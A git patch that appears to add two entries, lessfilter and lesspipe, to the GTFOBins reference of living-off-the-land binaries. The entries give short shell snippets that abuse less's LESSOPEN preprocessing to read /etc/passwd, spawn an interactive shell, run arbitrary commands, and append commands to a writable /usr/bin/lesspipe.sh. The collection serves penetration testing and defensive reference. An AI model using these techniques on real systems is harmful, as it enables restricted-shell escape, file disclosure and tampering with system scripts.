From b4bcbe11730fc9b4424b77f2a2df74386641432e Mon Sep 17 00:00:00 2001 From: jklm264 Date: Mon, 8 Sep 2025 11:22:32 -0400 Subject: [PATCH] Add lessfilter and lesspipe entries - Add lessfilter with file-read, shell, and command functions - Add lesspipe with file-read and command functions - https://jmussman.net/posts/lessopen/ --- _gtfobins/lessfilter.md | 35 +++++++++++++++++++++++++++++++++++ _gtfobins/lesspipe.md | 17 +++++++++++++++++ 2 files changed, 52 insertions(+) create mode 100644 _gtfobins/lessfilter.md create mode 100644 _gtfobins/lesspipe.md diff --git a/_gtfobins/lessfilter.md b/_gtfobins/lessfilter.md new file mode 100644 index 00000000..30def35f --- /dev/null +++ b/_gtfobins/lessfilter.md @@ -0,0 +1,35 @@ +--- +functions: + file-read: + - description: | + This can read arbitrary files by creating a custom lessfilter script. + code: | + echo '#!/bin/bash + cat "$1" + exit 0' > ~/.lessfilter + chmod +x ~/.lessfilter + export LESSOPEN="|~/.lessfilter %s" + less /etc/passwd + + shell: + - description: | + This can spawn an interactive shell by executing commands through lessfilter. + code: | + echo '#!/bin/bash + /bin/bash + exit 0' > ~/.lessfilter + chmod +x ~/.lessfilter + export LESSOPEN="|~/.lessfilter %s" + less anyfile + + command: + - description: | + This executes arbitrary commands through the lessfilter mechanism. + code: | + echo '#!/bin/bash + COMMAND + exit 0' > ~/.lessfilter + chmod +x ~/.lessfilter + export LESSOPEN="|~/.lessfilter %s" + less anyfile +--- diff --git a/_gtfobins/lesspipe.md b/_gtfobins/lesspipe.md new file mode 100644 index 00000000..bf76329d --- /dev/null +++ b/_gtfobins/lesspipe.md @@ -0,0 +1,17 @@ +--- +functions: + file-read: + - description: | + This can read files by modifying the system lesspipe script if writable. + code: | + echo 'cat /etc/passwd' >> /usr/bin/lesspipe.sh + less anyfile + + command: + - description: | + This executes commands if the lesspipe script is writable. + code: | + echo 'COMMAND' >> /usr/bin/lesspipe.sh + less anyfile +--- +